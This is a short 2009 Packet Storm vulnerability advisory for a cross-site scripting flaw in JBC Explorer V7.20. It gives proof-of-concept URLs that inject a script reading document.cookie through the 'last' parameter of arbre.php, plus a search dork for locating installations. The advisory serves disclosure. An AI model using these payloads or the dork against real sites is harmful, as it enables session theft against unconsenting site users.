Explorer 7.20 Cross Site Scripting

2009-12-21T00:00:00
ID PACKETSTORM:84129
Type packetstorm
Reporter Metropolis
Modified 2009-12-21T00:00:00

Description

                                        
                                            `###########################################  
#  
# Script Name : Explorer V7.20  
#  
# Version : V7.20 Release Candidate 1 REV A  
#  
# Bug Type : XSS vulnerability  
#  
# Found by : Metropolis  
#  
# Discovered : 20 December 2009  
#  
# Download app : http://www.jbc-explorer.info/?action=download&download=16  
#  
# Dork : JBC explorer [ by Psykokwak & XaV ]  
#  
###########################################  
  
PoC :  
  
http://[target]/[path]/dirsys/arbre.php?0=search&last=1[Xss]  
  
example :  
  
http://[target]/[path]/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>  
  
local Example :  
  
http://localhost/album/dirsys/arbre.php?0=search&last=1<body+onload=alert(document.cookie)>  
  
[ Greetz:  
  
[~]: Frf2 Az£L Z£L EsSandRe ticlem007 the killers themic Lariane All www.metropolis.thebigbang.fr :[~]  
  
`